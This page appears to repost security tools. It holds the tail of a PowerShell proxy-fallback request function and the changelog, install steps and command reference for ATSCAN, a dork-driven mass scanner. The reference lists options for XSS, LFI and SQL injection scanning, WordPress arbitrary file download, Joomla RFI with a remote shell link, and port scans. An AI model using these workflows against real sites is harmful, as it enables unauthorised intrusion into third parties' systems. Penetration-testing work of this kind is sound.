            if ($request | select -first 1 | % { $_.content -match $DummyString }) {
                $request = Invoke-BasicWebRequest $URL -ProxyURL $proxy_server -ProxyUser $username -ProxyPassword $password
                return
            }

            # 4.2: request with the .pac proxys URLs and credentials.
            if ($proxy_auto_url -ne $null) {
                $proxy_pac_config   = (New-Object System.Net.WebClient).DownloadString($proxy_auto_url)
                
                if ($proxy_pac_config -ne $null) {
                    # iterate through each proxy url match:
                    $proxy_pac_config | Select-String $proxy_pac_regex -AllMatches | % { $_.Matches } | % { 
                        # request dummystring for each proxy-url
                        $proxy_server_pac = $_.Groups["proxy"].Value

                        Write-Verbose "Trying http get with method #4.2: request with URL proxy from .pac file ($proxy_server_pac) and $username credential..."
                        $request = Invoke-BasicWebRequest $DummyURL -ProxyURL $proxy_server_pac -ProxyUser $username -ProxyPassword $password
                        if ($request | select -first 1 | % { $_.content -match $DummyString }) {
                            $request = Invoke-BasicWebRequest $URL -ProxyURL $proxy_server_pac -ProxyUser $username -ProxyPassword $password
                            return
                        }
                    }
                }
            }
        }
    }
    end { $request }
}

Download: forcewebrequest.zip
Source: https://github.com/daniel0x00

Changelog v9.6:
– Use proxy in ports scans.
– Fix get subdomains.
– Wide search engine and more results when using proxy.
– Fix some text errors.
– Show proxy info when used.
– Removed text from panel info code.Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libreries to install:
ap-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works in linux platforms. Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy.

Examples:
Simple search:
Search: –dork [dork] –level [level]
Search + get ip: –dork [dork] –level [level] –ip
Search + get ip + server: –dork [dork] –level [level] –ip –server
Search with many dorks: –dork [dork1,dork2,dork3] –level [level]
Search + get ip+server: –dork [dorks.txt] –level [level]
Search + set save file: –dork [dorks.txt] –level [level] –save myfile.txt
Search + Replace + Exploit: –dork [dorks.txt] –level [level] –replace [string] –with [string] –valid [string]

Subscan from Serach Engine:
Search + Exploitation: –dork [dork] –level [10] –xss/–lfi/–wp …
Search + Server Exploitation: -t [ip] –level [10] –xss/–lfi/–wp …
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –exp [exploit] –xss/–lfi/–wp …

Validation:
Search + Exploit + Validation: –dork [dork] –level [10] –exp –isup/–valid [string]
Search + Server Exploit + Validation: -t [ip] –level [10] –exp –isup/–valid [string]
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –isup/–valid [string]

Use List / Target:
-t [target/targets.txt] –exp –isup/–valid [string]
-t [target/targets.txt] –xss/–lfi ..

Server:
Get Server sites: -t [ip] –level [value] –sites
Get Server wordpress sites: -t [ip] –level [value] –wp
Get Server joomla sites: -t [ip] –level [value] –joom
Get Server upload sites: -t [ip] –level [value] –upload
Get Server zip sites files: -t [ip] –level [value] –zip
WP Arbitry File Download: -t [ip] –level [value] –wpadf
Joomla RFI: -t [ip] –level [1] –joomfri –shell [shell link]
Scan basic tcp (quick): -t [ip] –ports –basic tcp
Scan basic udp basic (quick): -t [ip] –ports –basic udp
Scan basic udp+tcp: -t [ip] –ports –basic udp+tcp
Scan complete tcp: -t [ip] –ports –all tcp
Scan complete udp: -t [ip] –ports –all udp
Scan complete udp+tcp: -t [ip] –ports –all udp+tcp
Scan rang tcp: -t [ip] –ports –select tcp –start [value] –end [value]
Scan rang udp: -t [ip] –ports –select udp–start [value] –end [value]
Scan rang udp + tcp: -t [ip] –ports –select udp+tcp –start [value] –end [value]

Encode / Decode:
Generate MD5: –md5 [string]
Encode base64: –encode64 [string]
Decode base64: –decode64 [string]

External Command:
–dork [dork/dorks.txt] –level [level] –command “curl -v –TARGET”
–dork [dork/dorks.txt] –level [level] –command “curl -v –FULL_TARGET”
-t [target/targets.txt] –level [level] –command “curl -v –TARGET”
-t [target/targets.txt] –command “curl -v –FULL_TARGET”

How to Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before Download: v9.6.zip | v9.6.tar.gz